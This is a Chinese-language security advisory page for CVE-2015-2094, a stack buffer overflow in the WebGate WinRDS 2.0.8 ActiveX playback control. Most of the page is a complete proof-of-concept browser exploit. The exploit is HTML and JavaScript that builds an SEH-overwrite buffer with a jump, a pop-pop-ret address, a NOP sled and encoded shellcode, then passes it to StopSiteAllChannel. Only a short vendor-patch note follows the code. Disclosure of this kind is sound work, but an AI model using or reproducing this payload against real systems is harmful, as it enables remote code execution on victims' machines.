WebGate WinRDS 2.0.8 StopSiteAllChannel 栈溢出漏洞
发表日期:2015-04-02 10:19:40
WebGate WinRDS 2.0.8 StopSiteAllChannel 栈溢出漏洞
CVE-ID:CVE-2015-2094
发布日期:2015-03-27
更新日期:2015-03-30
受影响系统:
Webgate WinRDS 2.0.8
详细信息:
WebGate WinRDS可通过网络传输DVR视频流。
WebGate WinRDS中,WESPPlayback.WESPPlaybackCtrl.1控件存在栈缓冲区溢出漏洞。通过与PrintSiteImage、PlaySiteAllChannel、StopSiteAllChannel、SaveSiteImage函数相关的攻击途径,远程攻击者可利用此漏洞执行任意代码。
来源:
Dave Weinstein
参考信息:
http://www.zerodayinitiative.com/advisories/ZDI-15-074/
测试方法:
警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title>
<!--
# Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day)
# Google Dork: [if relevant] (we will automatically add these to the GHDB)
# Date: 27th March, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
# Version: WinRDS 2.0.8
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : CVE-2015-2094
targetFile = "C:\\WINDOWS\\system32\\WESPSDK\\WESPPlayback.dll"
prototype = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Vulnerable Product = WinRDS 2.0.8
Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
-->
<object classid=\'clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8\' id=\'ssac\'>
</object>
<script>
var buff1 = "";
var nops = "";
var buff2 = "";
for (i=0;i<128; i++)
{
buff1 += "B";
}
nseh = "\\xeb\\x08PD";
//pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0
var seh = "\\xa0\\xf2\\x07\\x10";
for (i=0;i<80; i++)
{
nops += "\\x90";
}
sc = "\\x54\\x5d\\xda\\xc9\\xd9\\x75\\xf4\\x59\\x49\\x49\\x49\\x49\\x49" +
"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30" +
"\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30" +
"\\x30\\x41\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42" +
"\\x32\\x42\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a" +
"\\x49\\x4b\\x4c\\x5a\\x48\\x4b\\x32\\x45\\x50\\x55\\x50\\x43\\x30" +
"\\x53\\x50\\x4b\\x39\\x4d\\x35\\x30\\x31\\x4f\\x30\\x52\\x44\\x4c" +
"\\x4b\\x56\\x30\\x46\\x50\\x4c\\x4b\\x31\\x42\\x34\\x4c\\x4c\\x4b" +
"\\x31\\x42\\x44\\x54\\x4c\\x4b\\x32\\x52\\x47\\x58\\x54\\x4f\\x38" +
"\\x37\\x50\\x4a\\x37\\x56\\x46\\x51\\x4b\\x4f\\x4e\\x4c\\x57\\x4c" +
"\\x35\\x31\\x33\\x4c\\x33\\x32\\x46\\x4c\\x37\\x50\\x49\\x51\\x48" +
"\\x4f\\x34\\x4d\\x45\\x51\\x4f\\x37\\x4d\\x32\\x4a\\x52\\x36\\x32" +
"\\x46\\x37\\x4c\\x4b\\x36\\x32\\x32\\x30\\x4c\\x4b\\x30\\x4a\\x37" +
"\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x54\\x38\\x5a\\x43\\x51\\x58" +
"\\x33\\x31\\x4e\\x31\\x30\\x51\\x4c\\x4b\\x36\\x39\\x47\\x50\\x53" +
"\\x31\\x48\\x53\\x4c\\x4b\\x30\\x49\\x35\\x48\\x5a\\x43\\x36\\x5a" +
"\\x57\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x33\\x31\\x49\\x46\\x56" +
"\\x51\\x4b\\x4f\\x4e\\x4c\\x49\\x51\\x38\\x4f\\x54\\x4d\\x35\\x51" +
"\\x58\\x47\\x37\\x48\\x4d\\x30\\x34\\x35\\x4a\\x56\\x43\\x33\\x43" +
"\\x4d\\x5a\\x58\\x37\\x4b\\x43\\x4d\\x46\\x44\\x43\\x45\\x4d\\x34" +
"\\x56\\x38\\x4c\\x4b\\x56\\x38\\x31\\x34\\x43\\x31\\x4e\\x33\\x42" +
"\\x46\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x36\\x38\\x45\\x4c" +
"\\x45\\x51\\x4e\\x33\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x33\\x31\\x48" +
"\\x50\\x4c\\x49\\x57\\x34\\x36\\x44\\x51\\x34\\x51\\x4b\\x51\\x4b" +
"\\x33\\x51\\x30\\x59\\x50\\x5a\\x36\\x31\\x4b\\x4f\\x4b\\x50\\x31" +
"\\x4f\\x51\\x4f\\x51\\x4a\\x4c\\x4b\\x42\\x32\\x5a\\x4b\\x4c\\x4d" +
"\\x31\\x4d\\x53\\x5a\\x35\\x51\\x4c\\x4d\\x4c\\x45\\x58\\x32\\x43" +
"\\x30\\x53\\x30\\x55\\x50\\x56\\x30\\x42\\x48\\x50\\x31\\x4c\\x4b" +
"\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x59\\x45\\x4f\\x4b\\x5a\\x50\\x48" +
"\\x35\\x4f\\x52\\x30\\x56\\x53\\x58\\x4e\\x46\\x5a\\x35\\x4f\\x4d" +
"\\x4d\\x4d\\x4b\\x4f\\x38\\x55\\x47\\x4c\\x53\\x36\\x33\\x4c\\x45" +
"\\x5a\\x4b\\x30\\x4b\\x4b\\x4b\\x50\\x43\\x45\\x43\\x35\\x4f\\x4b" +
"\\x47\\x37\\x32\\x33\\x53\\x42\\x42\\x4f\\x42\\x4a\\x55\\x50\\x46" +
"\\x33\\x4b\\x4f\\x49\\x45\\x43\\x53\\x53\\x51\\x52\\x4c\\x52\\x43" +
"\\x36\\x4e\\x55\\x35\\x44\\x38\\x33\\x55\\x33\\x30\\x41\\x41";
for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
ssac.StopSiteAllChannel(fbuff);
</script>
</html>
解决办法:
厂商补丁:
Webgate
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&pt